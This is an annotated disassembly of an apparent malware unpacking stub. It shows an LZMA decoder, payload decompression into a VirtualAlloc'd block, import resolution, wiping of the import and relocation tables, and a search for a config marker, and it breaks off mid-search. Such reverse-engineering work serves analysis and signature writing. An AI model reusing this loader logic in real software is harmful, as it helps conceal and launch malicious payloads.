seg000:00C120CC         mov     edi, [esi]
seg000:00C120CE         sbb     eax, eax
seg000:00C120D0         and     eax, 0FFFFFFFDh
seg000:00C120D3         add     eax, 0Bh                ; state = (state < 7) ? 8 : 11
seg000:00C120D6         mov     [esi+18h], eax
seg000:00C120D9         add     edi, 0A68h              ; EDI = RepLenCoder
seg000:00C120DF
seg000:00C120DF loc_C120DF:                             ; CODE XREF: sub_C11EC3+156
seg000:00C120DF                                         ; --- length decode, EDI = length coder, EBX = posState ---
seg000:00C120DF         push    edi                     ; Choice bit
seg000:00C120E0         mov     eax, esi
seg000:00C120E2         call    ChangeOneWord
seg000:00C120E7         test    eax, eax
seg000:00C120E9         jnz     short EAX_1e
seg000:00C120EB         add     ebx, ebx                ; 2 * posState
seg000:00C120ED         and     [ebp+var_C], eax        ; EAX == 0 here: length offset = 0
seg000:00C120F0         push    8                       ; 3-bit tree (limit 8)
seg000:00C120F2         lea     edi, [edi+ebx*8+4]      ; EDI = Low[posState] (+2 words, 8 words per posState)
seg000:00C120F6         pop     eax
seg000:00C120F7         jmp     short loc_C1212B
seg000:00C120F9 ; ---------------------------------------------------------------------------
seg000:00C120F9
seg000:00C120F9 EAX_1e:                                 ; CODE XREF: sub_C11EC3+226
seg000:00C120F9         lea     eax, [edi+2]            ; Choice2 bit
seg000:00C120FC         push    eax
seg000:00C120FD         mov     eax, esi
seg000:00C120FF         call    ChangeOneWord
seg000:00C12104         test    eax, eax
seg000:00C12106         jnz     short EAX_1f
seg000:00C12108         push    8                       ; 3-bit tree
seg000:00C1210A         add     ebx, ebx
seg000:00C1210C         pop     eax
seg000:00C1210D         lea     edi, [edi+ebx*8+104h]   ; EDI = Mid[posState] (+130 words)
seg000:00C12114         mov     [ebp+var_C], eax        ; length offset = 8
seg000:00C12117         jmp     short loc_C1212B
seg000:00C12119 ; ---------------------------------------------------------------------------
seg000:00C12119
seg000:00C12119 EAX_1f:                                 ; CODE XREF: sub_C11EC3+243
seg000:00C12119         add     edi, 204h               ; EDI = High (+258 words)
seg000:00C1211F         mov     [ebp+var_C], 10h        ; length offset = 16
seg000:00C12126         mov     eax, 100h               ; 8-bit tree
seg000:00C1212B
seg000:00C1212B loc_C1212B:                             ; CODE XREF: sub_C11EC3+234
seg000:00C1212B                                         ; sub_C11EC3+254
seg000:00C1212B         push    eax                     ; limit
seg000:00C1212C         push    edi                     ; probs
seg000:00C1212D         push    esi                     ; context
seg000:00C1212E         call    sub_C11E9C              ; EAX = tree value
seg000:00C12133         mov     ebx, eax
seg000:00C12135         add     ebx, [ebp+var_C]        ; EBX = len (the +2 minimum is added at loc_C12252)
seg000:00C12138         cmp     dword ptr [esi+18h], 0Ch
seg000:00C1213C         mov     [ebp+var_4], ebx        ; save len
seg000:00C1213F         jb      loc_C12252              ; state < 12: repeat match, distance already in rep0
seg000:00C12145         cmp     ebx, 4                  ; --- distance decode for a simple match ---
seg000:00C12148         jnb     short loc_C1214E
seg000:00C1214A         mov     eax, ebx                ; lenState = min(len, 3)
seg000:00C1214C         jmp     short loc_C12151
seg000:00C1214E ; ---------------------------------------------------------------------------
seg000:00C1214E
seg000:00C1214E loc_C1214E:                             ; CODE XREF: sub_C11EC3+285
seg000:00C1214E         push    3
seg000:00C12150         pop     eax
seg000:00C12151
seg000:00C12151 loc_C12151:                             ; CODE XREF: sub_C11EC3+289
seg000:00C12151         mov     ecx, [esi]
seg000:00C12153         shl     eax, 7                  ; lenState * 64 words * 2 bytes
seg000:00C12156         push    40h                     ; 6-bit tree
seg000:00C12158         lea     eax, [eax+ecx+360h]     ; EAX = &PosSlot[lenState]
seg000:00C1215F         push    eax
seg000:00C12160         push    esi
seg000:00C12161         call    sub_C11E9C              ; EAX = posSlot
seg000:00C12166         mov     edi, eax                ; EDI = distance so far
seg000:00C12168         cmp     edi, 4
seg000:00C1216B         jb      loc_C1222D              ; posSlot < 4: distance = posSlot
seg000:00C12171         xor     eax, eax
seg000:00C12173         mov     ebx, edi
seg000:00C12175         mov     edx, edi                ; EDX = posSlot
seg000:00C12177         inc     eax                     ; EAX = 1
seg000:00C12178         shr     ebx, 1
seg000:00C1217A         and     edi, eax                ; posSlot & 1
seg000:00C1217C         dec     ebx                     ; EBX = numDirectBits = (posSlot >> 1) - 1
seg000:00C1217D         or      edi, 2                  ; distance = 2 | (posSlot & 1)
seg000:00C12180         mov     [ebp+var_8], ebx
seg000:00C12183         cmp     edx, 0Eh
seg000:00C12186         jnb     short loc_C121C5        ; posSlot >= 14: bits come straight from the range coder
seg000:00C12188         mov     ecx, ebx
seg000:00C1218A         shl     edi, cl                 ; distance <<= numDirectBits
seg000:00C1218C         mov     [ebp+var_C], eax        ; mask = 1
seg000:00C1218F         mov     ecx, edi
seg000:00C12191         sub     ecx, edx                ; distance - posSlot
seg000:00C12193         mov     edx, [esi]
seg000:00C12195         lea     ecx, [edx+ecx*2+55Eh]   ; ECX = &probs[SpecPos + distance - posSlot - 1]
seg000:00C1219C         mov     [ebp+var_14], ecx
seg000:00C1219F         mov     ecx, eax                ; i = 1
seg000:00C121A1
seg000:00C121A1 loc_C121A1:                             ; CODE XREF: sub_C11EC3+2FE
seg000:00C121A1                                         ; reverse bit-tree, numDirectBits steps
seg000:00C121A1         mov     eax, [ebp+var_14]
seg000:00C121A4         lea     ebx, [ecx+ecx]          ; EBX = 2*i
seg000:00C121A7         add     eax, ebx                ; EAX = &probs[i]
seg000:00C121A9         push    eax
seg000:00C121AA         mov     eax, esi
seg000:00C121AC         call    ChangeOneWord
seg000:00C121B1         lea     ecx, [ebx+eax]          ; i = 2*i + bit
seg000:00C121B4         test    eax, eax
seg000:00C121B6         jz      short EAX_0a
seg000:00C121B8         or      edi, [ebp+var_C]        ; distance |= mask
seg000:00C121BB
seg000:00C121BB EAX_0a:                                 ; CODE XREF: sub_C11EC3+2F3
seg000:00C121BB         shl     [ebp+var_C], 1          ; mask <<= 1
seg000:00C121BE         dec     [ebp+var_8]
seg000:00C121C1         jnz     short loc_C121A1
seg000:00C121C3         jmp     short loc_C1222A
seg000:00C121C5 ; ---------------------------------------------------------------------------
seg000:00C121C5
seg000:00C121C5 loc_C121C5:                             ; CODE XREF: sub_C11EC3+2C3
seg000:00C121C5         sub     ebx, 4                  ; numDirectBits - 4 bits read directly, 4 align bits after
seg000:00C121C8
seg000:00C121C8 loc_C121C8:                             ; CODE XREF: sub_C11EC3+32A
seg000:00C121C8         mov     eax, esi
seg000:00C121CA         call    GetOneSourceByte        ; normalise
seg000:00C121CF         shr     dword ptr [esi+0Ch], 1  ; range >>= 1
seg000:00C121D2         mov     eax, [esi+0Ch]          ; EAX = range
seg000:00C121D5         mov     edx, [esi+10h]
seg000:00C121D8         sub     edx, eax                ; EDX = code - range
seg000:00C121DA         mov     ecx, edx
seg000:00C121DC         shr     ecx, 1Fh
seg000:00C121DF         neg     ecx                     ; ECX = (code < range) ? -1 : 0
seg000:00C121E1         and     eax, ecx
seg000:00C121E3         add     eax, edx                ; code unchanged if code < range, else code -= range
seg000:00C121E5         dec     ebx
seg000:00C121E6         lea     edi, [ecx+edi*2+1]      ; distance = 2*distance + ((code < range) ? 0 : 1)
seg000:00C121EA         mov     [esi+10h], eax
seg000:00C121ED         jnz     short loc_C121C8        ; ZF from the dec (lea/mov keep flags)
seg000:00C121EF         mov     ebx, [esi]
seg000:00C121F1         xor     ecx, ecx
seg000:00C121F3         add     ebx, 644h               ; EBX = Align table
seg000:00C121F9         shl     edi, 4                  ; room for the 4 align bits
seg000:00C121FC         inc     ecx                     ; i = 1
seg000:00C121FD         mov     [ebp+var_8], ecx        ; mask = 1
seg000:00C12200
seg000:00C12200 loc_C12200:                             ; CODE XREF: sub_C11EC3+360
seg000:00C12200                                         ; reverse 4-bit tree
seg000:00C12200         lea     eax, [ecx+ecx]
seg000:00C12203         mov     [ebp+var_14], eax       ; 2*i
seg000:00C12206         add     eax, ebx                ; EAX = &Align[i]
seg000:00C12208         push    eax
seg000:00C12209         mov     eax, esi
seg000:00C1220B         call    ChangeOneWord
seg000:00C12210         mov     ecx, [ebp+var_14]
seg000:00C12213         add     ecx, eax                ; i = 2*i + bit
seg000:00C12215         test    eax, eax
seg000:00C12217         jz      short EAX_0b
seg000:00C12219         or      edi, [ebp+var_8]        ; distance |= mask
seg000:00C1221C
seg000:00C1221C EAX_0b:                                 ; CODE XREF: sub_C11EC3+354
seg000:00C1221C         shl     [ebp+var_8], 1          ; mask <<= 1
seg000:00C1221F         cmp     [ebp+var_8], 10h
seg000:00C12223         jl      short loc_C12200        ; 4 iterations (mask 1,2,4,8); signed compare is safe here
seg000:00C12225         cmp     edi, 0FFFFFFFFh
seg000:00C12228         jz      short loc_C12293        ; distance 0FFFFFFFFh = end-of-stream marker
seg000:00C1222A
seg000:00C1222A loc_C1222A:                             ; CODE XREF: sub_C11EC3+300
seg000:00C1222A         mov     ebx, [ebp+var_4]        ; EBX = len (EBX was clobbered above)
seg000:00C1222D
seg000:00C1222D loc_C1222D:                             ; CODE XREF: sub_C11EC3+2A8
seg000:00C1222D                                         ; new distance: rotate the rep history
seg000:00C1222D         mov     eax, [ebp+var_20]
seg000:00C12230         mov     [ebp+var_1C], eax       ; rep3 = rep2
seg000:00C12233         mov     eax, [ebp+var_24]
seg000:00C12236         mov     [ebp+var_20], eax       ; rep2 = rep1
seg000:00C12239         mov     eax, [ebp+var_28]
seg000:00C1223C         inc     edi                     ; rep0 = distance + 1
seg000:00C1223D         cmp     dword ptr [esi+18h], 13h ; CF for the state update
seg000:00C12241         mov     [ebp+var_24], eax       ; rep1 = rep0
seg000:00C12244         sbb     eax, eax
seg000:00C12246         and     eax, 0FFFFFFFDh
seg000:00C12249         add     eax, 0Ah                ; state = (state < 19) ? 7 : 10  (undoes the +12 from 00C1200F)
seg000:00C1224C         mov     [ebp+var_28], edi
seg000:00C1224F         mov     [esi+18h], eax
seg000:00C12252
seg000:00C12252 loc_C12252:                             ; CODE XREF: sub_C11EC3+27C
seg000:00C12252                                         ; --- copy the match: len+2 bytes from distance rep0 ---
seg000:00C12252         mov     edx, [esi+14h]          ; EDX = index in dest buffer (pos)
seg000:00C12255         mov     eax, [ebp+arg_0]        ; EAX = size of dest buffer
seg000:00C12258         mov     ecx, [ebp+var_28]       ; ECX = rep0
seg000:00C1225B         sub     eax, edx                ; EAX = bytes remaining in the output
seg000:00C1225D         add     ebx, 2                  ; len += 2 (minimum match length)
seg000:00C12260         cmp     eax, ebx
seg000:00C12262         mov     edi, eax
seg000:00C12264         mov     eax, [esi+4]
seg000:00C12267         cmovnb  edi, ebx                ; move if CF=0, i.e. remaining >= len (unsigned): EDI = min(remaining, len)
seg000:00C1226A         add     eax, edx                ; EAX = &dict[pos]
seg000:00C1226C         neg     ecx                     ; ECX = -rep0
seg000:00C1226E         add     edx, edi                ; pos += count
seg000:00C12270         lea     ebx, [eax+edi]          ; EBX = copy end
seg000:00C12273         mov     [esi+14h], edx
seg000:00C12276
seg000:00C12276 loc_C12276:                             ; CODE XREF: sub_C11EC3+3BB
seg000:00C12276                                         ; byte-wise so that overlap (rep0 < len) works; no check that rep0 <= pos
seg000:00C12276         mov     dl, [ecx+eax]           ; DL = dict[p - rep0]
seg000:00C12279         mov     [eax], dl               ; dict[p] = DL
seg000:00C1227B         inc     eax
seg000:00C1227C         cmp     eax, ebx
seg000:00C1227E         jnz     short loc_C12276
seg000:00C12280
seg000:00C12280 loc_C12280:                             ; CODE XREF: sub_C11EC3+12D
seg000:00C12280         xor     edi, edi
seg000:00C12282         inc     edi                     ; restore the EDI == 1 invariant for the next literal
seg000:00C12283
seg000:00C12283 nextBlock:                              ; CODE XREF: sub_C11EC3+1B3
seg000:00C12283         mov     eax, [esi+14h]
seg000:00C12286         cmp     eax, [ebp+arg_0]        ; Destination buffer full ?
seg000:00C12289         jnb     short loc_C12297        ; Yes => this is the end !
seg000:00C1228B         mov     edx, [ebp+var_18]       ; EDX = posState mask, expected by loc_C11EF0
seg000:00C1228E         jmp     loc_C11EF0              ; No, next block please...
seg000:00C12293 ; ---------------------------------------------------------------------------
seg000:00C12293
seg000:00C12293 loc_C12293:                             ; CODE XREF: sub_C11EC3+365
seg000:00C12293         add     dword ptr [esi+18h], 0FFFFFFF4h ; state -= 12 (end marker seen while state still held the +12)
seg000:00C12297
seg000:00C12297 loc_C12297:                             ; CODE XREF: sub_C11EC3+3C6
seg000:00C12297         mov     eax, esi
seg000:00C12299         call    GetOneSourceByte        ; final normalisation
seg000:00C1229E         pop     edi
seg000:00C1229F         xor     eax, eax                ; return 0 (no success/failure distinction)
seg000:00C122A1         pop     ebx
seg000:00C122A2         leave
seg000:00C122A3         retn    4                       ; pops arg_0
seg000:00C122A3 sub_C11EC3 endp
seg000:00C122A3 ; *****************************************************************************
seg000:00C122A3 ; * END OF DECIPHERING FUNCTIONS *
seg000:00C122A3 ; *****************************************************************************
seg000:00C122A3
seg000:00C122A3
seg000:00C122A3
seg000:00C122A6 ; ***********************************************************
seg000:00C122A6 ; * Entry point *
seg000:00C122A6 ; ***********************************************************
seg000:00C122A6 ;
seg000:00C122A6 ; IN :
seg000:00C122A6 ; -------------------
seg000:00C122A6 ; [EBP+8] =
0x401000 (Start of code segment) seg000:00C122A6 ; [EBP+0Ch] = 0xB70000 (Start of memory block where we are, contains previous deciphered payload) seg000:00C122A6 ; [EBP+10h] = 0x4A39A (End of source of last deciphered payload) seg000:00C122A6 ; seg000:00C122A6 ; Locals : seg000:00C122A6 ; ----------------- seg000:00C122A6 ; [EBP-4] = 0x2134D3 seg000:00C122A6 ; [EBP-10h] = 0x21A000 (size of memory block where we are) seg000:00C122A6 seg000:00C122A6 seg000:00C122A6 loc_C122A6: ; CODE XREF: seg000:00C12504 seg000:00C122A6 push ebp seg000:00C122A7 mov ebp, esp seg000:00C122A9 sub esp, 44h seg000:00C122AC push ebx ; EBX=0x401000 seg000:00C122AD push esi ; ESI=0x4A439A (source end of the last copy, ie step3) seg000:00C122AE mov esi, [ebp+0Ch] ; Block address in which we are : 00B70000h seg000:00C122B1 push edi ; End of destination block of last copy, ie step3. So end (filled) of block in which we are (C12509h). seg000:00C122B2 lea eax, [esi+10h] ; EAX=B70010h seg000:00C122B5 mov ebx, [eax] ; EBX=21A000h (block size) seg000:00C122B7 mov [ebp-10h], eax seg000:00C122BA mov eax, [esi+25h] ; EAX=002134D3h seg000:00C122BD mov [ebp-4], eax seg000:00C122C0 movzx eax, byte ptr [esi+20h] ; EAX=34h seg000:00C122C4 push 9 seg000:00C122C6 pop ecx ; ECX=9 seg000:00C122C7 xor edx, edx seg000:00C122C9 div ecx ; EAX/ECX (EAX=quotient and EDX=remainder). 0x34/9 => EAX=5 EDX=7 seg000:00C122CB push 5 seg000:00C122CD pop edi ; EDI=5 seg000:00C122CE push 4 ; PAGE_READWRITE seg000:00C122D0 push 1000h ; MEM_COMMIT seg000:00C122D5 mov [ebp-8], esi ; [EBP-8] = B70000h seg000:00C122D8 mov [ebp-0Ch], ebx ; [EBP-0Ch] = block size, ie 0x21A000 seg000:00C122DB mov ecx, edx ; ECX=7 seg000:00C122DD xor edx, edx seg000:00C122DF div edi ; EAX/EDI (EAX=quotient et EDX=reste). 
5/5 => EAX=1 EDX=0 seg000:00C122E1 mov [ebp-20h], ecx seg000:00C122E4 mov edi, 300h seg000:00C122E9 mov [ebp-18h], eax seg000:00C122EC mov eax, edx seg000:00C122EE add ecx, eax seg000:00C122F0 shl edi, cl ; EDI=18000h seg000:00C122F2 mov [ebp-1Ch], eax seg000:00C122F5 add edi, 736h ; EDI=18736h seg000:00C122FB lea eax, [ebx+edi*2] ; EAX=24AE6Ch seg000:00C122FE push eax seg000:00C122FF mov eax, [ebp+8] ; EAX=401000h seg000:00C12302 push 0 seg000:00C12304 call dword ptr [eax+4] ; EAX = VirtualAlloc ( NULL, 0x24AE6C, MEM_COMMIT, PAGE_READWRITE ); seg000:00C12307 mov ebx, eax ; EAX=D90000h seg000:00C12309 mov eax, [ebp-0Ch] seg000:00C1230C add eax, ebx ; EAX=FAA000h seg000:00C1230E lea edx, [ebp-44h] ; EDX is used to pass parameters to the next function called [EDX], [EDX+18h], [EDX+24h] et [EDX+28h] seg000:00C12311 mov [ebp-40h], ebx ; New allocated block seg000:00C12314 mov [ebp-44h], eax ; EAX=0xFAA000 seg000:00C12317 mov [ebp-28h], edi ; EDI=0x18736 seg000:00C1231A call fill_with_0x400 seg000:00C1231F mov eax, [esi+2Eh] ; 0x6F000000 seg000:00C12322 push dword ptr [ebp-4] seg000:00C12325 or dword ptr [ebp-38h], 0FFFFFFFFh seg000:00C12329 and dword ptr [ebp-30h], 0 seg000:00C1232D add esi, 32h ; ESI=0xB70032 seg000:00C12330 bswap eax ; EAX=0x6F00 seg000:00C12332 mov [ebp-3Ch], esi seg000:00C12335 mov esi, edx ; ESI will be used to access parameters in the deciphering function to call seg000:00C12337 mov [ebp-34h], eax seg000:00C1233A call sub_C11EC3 ; <======================= Deciphering payload !!! seg000:00C1233F mov eax, [ebp-8] ; EAX=0xB70000 seg000:00C12342 mov esi, [eax] seg000:00C12344 add esi, ebx ; ESI refers 00F9D03C which contains "KERNEL32.dll"... 
seg000:00C12346 mov [ebp-4], esi seg000:00C12349 jmp short loc_C12387 seg000:00C1234B ; --------------------------------------------------------------------------- seg000:00C1234B seg000:00C1234B seg000:00C1234B ;********************************************************************************* seg000:00C1234B ;* This part gets all imports necessary (listed at 0xF9D03C) seg000:00C1234B ;* seg000:00C1234B ;* Format = [Library1 name]\0[Function Name]\0[Pointer to function address] seg000:00C1234B ;* ... seg000:00C1234B ;* [Function Name]\0[Pointer to function address]\0 seg000:00C1234B ;* [Library2 name]\0[Function Name]\0[Pointer to function address] seg000:00C1234B ;* ... seg000:00C1234B ;* [Function Name]\0[Pointer to function address]\0\0 seg000:00C1234B ;* seg000:00C1234B ;* Size of imports = 0x1561 seg000:00C1234B ;********************************************************************************* seg000:00C1234B seg000:00C1234B loc_C1234B: ; CODE XREF: seg000:00C1238A seg000:00C1234B mov edi, [ebp+8] seg000:00C1234E push esi ; "KERNEL32.dll" seg000:00C1234F call dword ptr [edi] ; LoadLibrary() seg000:00C12351 mov [ebp-0Ch], eax seg000:00C12354 ; seg000:00C12354 ; Next function name please seg000:00C12354 seg000:00C12354 loc_C12354: ; CODE XREF: seg000:00C12359 seg000:00C12354 mov al, [esi] seg000:00C12356 inc esi seg000:00C12357 test al, al seg000:00C12359 jnz short loc_C12354 seg000:00C1235B seg000:00C1235B loc_C1235B: ; CODE XREF: seg000:00C12384 seg000:00C1235B cmp byte ptr [esi], 1 seg000:00C1235E mov eax, esi seg000:00C12360 jnz short loc_C1236B seg000:00C12362 movzx eax, word ptr [esi+1] seg000:00C12366 add esi, 3 seg000:00C12369 jmp short loc_C12372 seg000:00C1236B ; --------------------------------------------------------------------------- seg000:00C1236B ; seg000:00C1236B ; Move forward to the end of function name seg000:00C1236B seg000:00C1236B loc_C1236B: ; CODE XREF: seg000:00C12360 seg000:00C1236B ; seg000:00C12370 seg000:00C1236B mov cl, [esi] 
seg000:00C1236D inc esi seg000:00C1236E test cl, cl seg000:00C12370 jnz short loc_C1236B seg000:00C12372 seg000:00C12372 loc_C12372: ; CODE XREF: seg000:00C12369 seg000:00C12372 push eax ; Stacks function name seg000:00C12373 push dword ptr [ebp-0Ch] ; Stacks DLL handle seg000:00C12376 call dword ptr [edi+0Ch] ; GetProcAddress() seg000:00C12379 mov ecx, [esi] ; ECX = offset for saving function address seg000:00C1237B add esi, 4 ; Next function name seg000:00C1237E mov [ecx+ebx], eax ; Saving function address (ebx = process base address in memory, ie 0xD90000) seg000:00C12381 cmp byte ptr [esi], 0 ; Is there another function address to get ? seg000:00C12384 jnz short loc_C1235B seg000:00C12386 inc esi seg000:00C12387 seg000:00C12387 loc_C12387: ; CODE XREF: seg000:00C12349 seg000:00C12387 cmp byte ptr [esi], 0 seg000:00C1238A jnz short loc_C1234B seg000:00C1238A seg000:00C1238A seg000:00C1238C ;--------------------------------------------------------------------------------- seg000:00C1238C ; Now erase the import table... seg000:00C1238C ; ...and move to the next table (relocations one) seg000:00C1238C seg000:00C1238C sub esi, [ebp-4] seg000:00C1238F mov [ebp-0Ch], esi seg000:00C12392 mov edi, [ebp-4] ; EDI refers start of imports table (0xF9D03C) seg000:00C12395 xor eax, eax ; Fill the block with '0' seg000:00C12397 mov ecx, [ebp-0Ch] ; ECX = 0x1561 (block size to erase) seg000:00C1239A rep stosb ; Erasing... seg000:00C1239C mov eax, [ebp-8] ; EAX=B70000 (start of allocated block) seg000:00C1239F mov eax, [eax+4] ; EAX=0x20E59E seg000:00C123A2 add eax, ebx ; EAX = F9E59E, ie block just after the one we erased... 
seg000:00C123A4 mov [ebp-4], eax        ; [ebp-4] = start of relocation table (erased again at C12460)
seg000:00C123A7 mov esi, 1000h          ; Starting to relocate at offset 0x1000 (ESI = RVA of the code-scan cursor)
seg000:00C123AC xor edi, edi            ; EDI = RVA of the current absolute-address slot, accumulated from deltas
seg000:00C123AE jmp loc_C12456          ; Read the first tag byte
seg000:00C123AE
seg000:00C123AE
seg000:00C123AE
seg000:00C123AE ; ********************************************************************************
seg000:00C123AE ; * Relocate all jmp, call, jxx and constant addresses *
seg000:00C123AE ; ********************************************************************************
seg000:00C123AE ; Table format (as decoded by the code below): a stream of tag bytes, 0 terminates.
seg000:00C123AE ;   tag 2 -> delta = next 2 bytes ; tag 3 -> delta = next 3 bytes ;
seg000:00C123AE ;   any other tag -> delta = the tag byte itself.
seg000:00C123AE ; EDI += delta is the RVA of a DWORD holding a big-endian RVA, converted to an
seg000:00C123AE ; absolute VA at relocConstant. Before that, the code between the previous slot
seg000:00C123AE ; and this one is scanned for E8 / E9 / 0F 8x and their big-endian operands are
seg000:00C123AE ; rewritten as rel32 displacements.
seg000:00C123B3
seg000:00C123B3 loc_C123B3: ; CODE XREF: seg000:00C1245A
seg000:00C123B3 movzx ecx, cl           ; ECX = tag byte (nonzero here)
seg000:00C123B6 inc eax                 ; Next byte in relocation table
seg000:00C123B7 cmp ecx, 2
seg000:00C123BA jnz short threeBytesOffset
seg000:00C123BC movzx ecx, word ptr [eax] ; Gets two bytes in relocation table (16-bit delta)
seg000:00C123BF add eax, 2              ; Moves forward two bytes in relocation table
seg000:00C123C2 jmp short loc_C123D4
seg000:00C123C4 ; ---------------------------------------------------------------------------
seg000:00C123C4
seg000:00C123C4 threeBytesOffset: ; CODE XREF: seg000:00C123BA
seg000:00C123C4 cmp ecx, 3
seg000:00C123C7 jnz short loc_C123D4    ; Tag is neither 2 nor 3: the tag value itself is the delta
seg000:00C123C9 mov ecx, [eax]          ; Reads a full DWORD (one byte past the 3-byte field)...
seg000:00C123CB and ecx, 0FFFFFFh       ; ...and keeps the low 24 bits (24-bit delta)
seg000:00C123D1 add eax, 3
seg000:00C123D4
seg000:00C123D4 loc_C123D4: ; CODE XREF: seg000:00C123C2
seg000:00C123D4 ; seg000:00C123C7
seg000:00C123D4 add edi, ecx            ; EDI = next offset with a constant address to relocate
seg000:00C123D6 mov ecx, [ebp-8]        ; ECX = 0xB70000 (loader header)
seg000:00C123D9 mov ecx, [ecx+0Ch]      ; ECX = header field +0Ch; the same field is pushed as the VirtualProtect size at C124E9, so it is the size of the image region
seg000:00C123DC cmp esi, ecx            ; Scan cursor already at/after the end of the image ?
seg000:00C123DE jnb short relocConstant ; Yes: no code to scan, just fix the constant
seg000:00C123E0 ;
seg000:00C123E0 lea edx, [edi-5]        ; EDX=EDI-5 : last RVA where a 5-byte call/jmp ends before the slot at EDI
seg000:00C123E3 add ecx, 0FFFFFFFCh     ; ECX=ECX-4 : last RVA where a DWORD operand still fits in the image
seg000:00C123E6 mov [ebp-0Ch], edx      ; [ebp-0Ch] = scan limit = min(EDI-5, size-4), tested at loc_C12444
seg000:00C123E9 cmp edx, ecx            ; If next offset is after end
seg000:00C123EB jbe short loc_C12444
seg000:00C123ED mov [ebp-0Ch], ecx      ; So next offset = end
seg000:00C123F0 jmp short loc_C12444
seg000:00C123F2 ; ---------------------------------------------------------------------------
seg000:00C123F2
seg000:00C123F2 lookForCallJmpJxx: ; CODE XREF: seg000:00C12447
seg000:00C123F2 ; This is a byte scan, not a disassembler: any E8 / E9 / 0F 8x byte in the scanned
seg000:00C123F2 ; range is treated as an instruction, whatever it really is.
seg000:00C123F2 mov cl, [esi+ebx]       ; CL = code byte at base+ESI
seg000:00C123F5 cmp cl, 0E8h            ; CALL opcode !
seg000:00C123F8 jz short relocCallOrJmp
seg000:00C123FA cmp cl, 0E9h            ; JMP opcode !
seg000:00C123FD jz short relocCallOrJmp
seg000:00C123FF cmp cl, 0Fh             ; Two bytes instruction
seg000:00C12402 jnz short NextSrcByte
seg000:00C12404 mov cl, [esi+ebx+1]
seg000:00C12408 and cl, 0F0h            ; testing 4 high bits (conditional jump rel32 instructions have opcodes 0x0F80 to 0x0F8F)
seg000:00C1240B cmp cl, 80h
seg000:00C1240E jnz short NextSrcByte   ; No Jmp or Call, so next byte please...
seg000:00C12410 lea ecx, [edi-6]        ; A 6-byte Jcc at ESI must end before the slot at EDI
seg000:00C12413 cmp esi, ecx
seg000:00C12415 ja short NextSrcByte
seg000:00C12417 ;
seg000:00C12417 ; relocate conditional jump
seg000:00C12417 mov ecx, [esi+ebx+2]    ; ECX = stored operand (big-endian)
seg000:00C1241B push 0FFFFFFFAh         ; EDX = -6 ...
seg000:00C1241D pop edx
seg000:00C1241E sub edx, esi            ; ... - ESI, ie EDX = -(ESI+6) = minus the RVA of the next instruction
seg000:00C12420 bswap ecx               ; Endian modification
seg000:00C12422 add ecx, edx            ; ECX = stored value - (ESI+6): the stored RVA becomes a rel32
seg000:00C12424 mov [esi+ebx+2], ecx    ; Puts offset in place
seg000:00C12428 add esi, 6              ; Skip the whole Jcc rel32 instruction
seg000:00C1242B jmp short loc_C12444
seg000:00C1242D ; ---------------------------------------------------------------------------
seg000:00C1242D
seg000:00C1242D NextSrcByte: ; CODE XREF: seg000:00C12402
seg000:00C1242D ; seg000:00C1240E ...
seg000:00C1242D inc esi
seg000:00C1242E jmp short loc_C12444
seg000:00C12430 ; ---------------------------------------------------------------------------
seg000:00C12430
seg000:00C12430 relocCallOrJmp: ; CODE XREF: seg000:00C123F8
seg000:00C12430 ; seg000:00C123FD
seg000:00C12430 mov ecx, [esi+ebx+1]    ; ECX = DWORD following 0xE8 or 0xE9, ie call or jmp destination (big-endian)
seg000:00C12434 push 0FFFFFFFBh         ; EDX = -5 ...
seg000:00C12436 pop edx
seg000:00C12437 sub edx, esi            ; ... - ESI, ie EDX = -(ESI+5) = minus the RVA of the next instruction
seg000:00C12439 bswap ecx               ; Endian modification
seg000:00C1243B add ecx, edx            ; ECX = stored value - (ESI+5): the stored RVA becomes a rel32
seg000:00C1243D mov [esi+ebx+1], ecx    ; Puts modified DWORD in place
seg000:00C12441 add esi, 5              ; Moves ESI to skip the DWORD
seg000:00C12444
seg000:00C12444 loc_C12444: ; CODE XREF: seg000:00C123EB
seg000:00C12444 ; seg000:00C123F0 ...
seg000:00C12444 cmp esi, [ebp-0Ch]      ; Block end ?
seg000:00C12447 jbe short lookForCallJmpJxx ; No, next byte of code...
seg000:00C12449 lea esi, [edi+4]        ; ESI=EDI+4 : resume the scan just after the constant's DWORD
seg000:00C1244C
seg000:00C1244C relocConstant: ; CODE XREF: seg000:00C123DE
seg000:00C1244C mov ecx, [edi+ebx]      ; Stored big-endian RVA
seg000:00C1244F bswap ecx
seg000:00C12451 add ecx, ebx            ; + actual base = absolute VA
seg000:00C12453 mov [edi+ebx], ecx
seg000:00C12456
seg000:00C12456 loc_C12456: ; CODE XREF: seg000:00C123AE
seg000:00C12456 mov cl, [eax]           ; Taking one byte from relocations table
seg000:00C12458 test cl, cl             ; A 0 tag ends the table
seg000:00C1245A jnz loc_C123B3
seg000:00C12460 ;
seg000:00C12460 ;--------------------------------------------------------------------------
seg000:00C12460 ; Erase the relocation table we just used (same wiping as for the import table)
seg000:00C12460 sub eax, [ebp-4]        ; EAX = table length (EAX stopped on the terminating 0)
seg000:00C12463 mov [ebp-0Ch], eax
seg000:00C12466 mov edi, [ebp-4]
seg000:00C12469 xor eax, eax
seg000:00C1246B mov ecx, [ebp-0Ch]
seg000:00C1246E rep stosb               ; Erasing 0x4F34 bytes long block
seg000:00C1246E
seg000:00C1246E
seg000:00C1246E
seg000:00C12470 ;*****************************************************************************
seg000:00C12470 ;* Search a signature in 0xD90000 block
seg000:00C12470 ;*****************************************************************************
seg000:00C12470 ; The 12-byte marker '!-#cfgbeg-#!' and the 'END!' terminator compared below are
seg000:00C12470 ; fixed strings in the unpacked image and make a usable memory/static signature.
seg000:00C12470 mov eax, [ebp-10h]
seg000:00C12473 mov ecx, [eax]          ; ECX = size bound of the search (used as count-0x40 and as RVA limit-4 below)
seg000:00C12475 and dword ptr [ebp-4], 0 ; [ebp-4] = loop counter = 0
seg000:00C12479 lea edi, [ecx-40h]      ; EDI = number of candidate positions (size - 0x40)
seg000:00C1247C test edi, edi
seg000:00C1247E jz short loc_C124E0     ; Nothing to search
seg000:00C12480 mov dword ptr [ebp-0Ch], 0Ch
seg000:00C12487 sub [ebp-0Ch], ebx      ; [ebp-0Ch] = 0xC - base, so that [ebp-0Ch]+ESI = RVA just after the 12-byte signature
seg000:00C1248A mov esi, ebx            ; ESI = 0xD90000
seg000:00C1248C
seg000:00C1248C loc_C1248C: ; CODE XREF: seg000:00C124C8
seg000:00C1248C cmp dword ptr [esi], 63232D21h ; '!-#c'
seg000:00C12492 mov [ebp-14h], esi      ; Remember candidate address
seg000:00C12495 jnz short loc_C124C1
seg000:00C12497 cmp dword ptr [esi+4], 65626766h ; 'fgbe'
